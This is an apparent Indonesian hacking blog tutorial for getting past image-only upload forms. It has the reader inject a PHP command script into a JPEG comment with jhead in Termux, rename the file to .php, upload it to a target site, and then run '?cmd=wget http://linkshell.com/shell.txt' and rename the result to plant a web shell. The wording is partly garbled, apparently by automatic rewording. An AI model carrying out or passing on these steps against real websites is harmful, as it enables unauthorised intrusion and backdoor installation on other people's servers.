Inject Php Script Ke Image Dengan Jhead

Kadang ada aja website pas mau upload shell tapi cuma dapat upload gambar aja. Pernah ngalamin gk sih? W sih sering ekekekek :"v pengennya sih di tamper tapi apa daya kita user andro :'(.

Nah disini w mau kasih solusinya muehehe caranya cukup gampang tinggal ikuti saja tutorial dibawah.
Inject php script ke image dengan jhead di termux.

Siapkan dulu gambar yg pengen di injek, kalo mau ambil aja gambar dibawah ini gan hehe

Yg niscaya kalian harus download aplikasi termux dulu di playstore iyh gan.

Langsung aja masukan command dibawah ke termux.
$pkg install jhead
$jhead -purejpg namagambar.jpg
(Untuk membersihkan comment dari gambar)
$jhead -ce namagambar.jpg
(Untuk memunculkan vim text editor menyerupai gambar dibawah ini)

Masukkan script inject php ke vim text editor, Monggo ambil scriptnya Disini onii-chan kemudian kalian save. Cara save nya tekan tombol ESC di termux kemudian ketikkan :x. Jika sukses akan ada goresan pena modified namagambar.jpg
$jhead namagambar.jpg

Jika muncul code pada gambar menyerupai diatas, berarti inject script phpnya sudah masuk kedalam gambar tersebut dan tinggal direname ke extensi php kemudian upload ditarget kalian.

Nah gimana cara sanksi nya?

/namafile.php?cmd=
Untuk upload shell atau backdoor kalian dapat mengunakan fungsi wget, curl, atau yang lain alasannya yakni terkadang ada website yang tidak suport wget atau curl.

lusuka.co.li/namafile.php?cmd=wget http://linkshell.com/shell.txt
Setelah itu kita rename dari shell.txt ke shell.php

lusuka.co.li/namafile.php?cmd=mv shell.txt shell.php

Atau dapat juga menyerupai ini
lusuka.co.li/namafile.php?cmd=wget linkshell.com/shell.txt -O shell.php
Tinggal saluran Shell mu mitra qu h3h3

lusuka.co.li/shell.php

Sumber https://nyamukdisc0de.blogspot.com/

Share this Article